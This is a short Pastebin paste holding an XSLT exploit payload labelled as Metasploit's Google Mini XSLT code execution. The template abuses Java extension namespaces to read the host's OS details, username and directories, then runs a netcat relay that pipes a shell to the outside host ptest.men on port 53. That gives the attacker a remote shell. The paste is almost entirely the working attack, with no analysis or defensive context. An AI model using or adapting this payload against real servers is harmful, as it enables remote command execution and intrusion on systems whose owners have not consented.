Advertisement
Guest User

Untitled

a guest
Mar 19th, 2018
105
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.05 KB | None | 0 0
  1. <xsl:template
  2. name="my_page_footer"
  3. xmlns:sys="http://www.oracle.com/XSL/Transform/java/java.lang.System"
  4. xmlns:run="http://www.oracle.com/XSL/Transform/java/java.lang.Runtime"
  5. >
  6.  
  7. <!-- Google Mini XSLT Code Execution [metasploit] -->
  8.  
  9. XSLT Version: <xsl:value-of select="system-property('xsl:version')"/> <br />
  10. XSLT Vendor: <xsl:value-of select="system-property('xsl:vendor')" /> <br />
  11. XSLT URL: <xsl:value-of select="system-property('xsl:vendor-url')" /> <br />
  12. OS: <xsl:value-of select="sys:getProperty('os.name')" /> <br />
  13. Version: <xsl:value-of select="sys:getProperty('os.version')" /> <br />
  14. Arch: <xsl:value-of select="sys:getProperty('os.arch')" /> <br />
  15. UserName: <xsl:value-of select="sys:getProperty('user.name')" /> <br />
  16. UserHome: <xsl:value-of select="sys:getProperty('user.home')" /> <br />
  17. UserDir: <xsl:value-of select="sys:getProperty('user.dir')" /> <br />
  18.  
  19. Executing command...<br />
  20. <xsl:value-of select="run:exec(run:getRuntime(), 'sh -c nc ptest.men 53 |sh |nc ptest.men 53')" />
  21. </span>
  22. </xsl:template>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement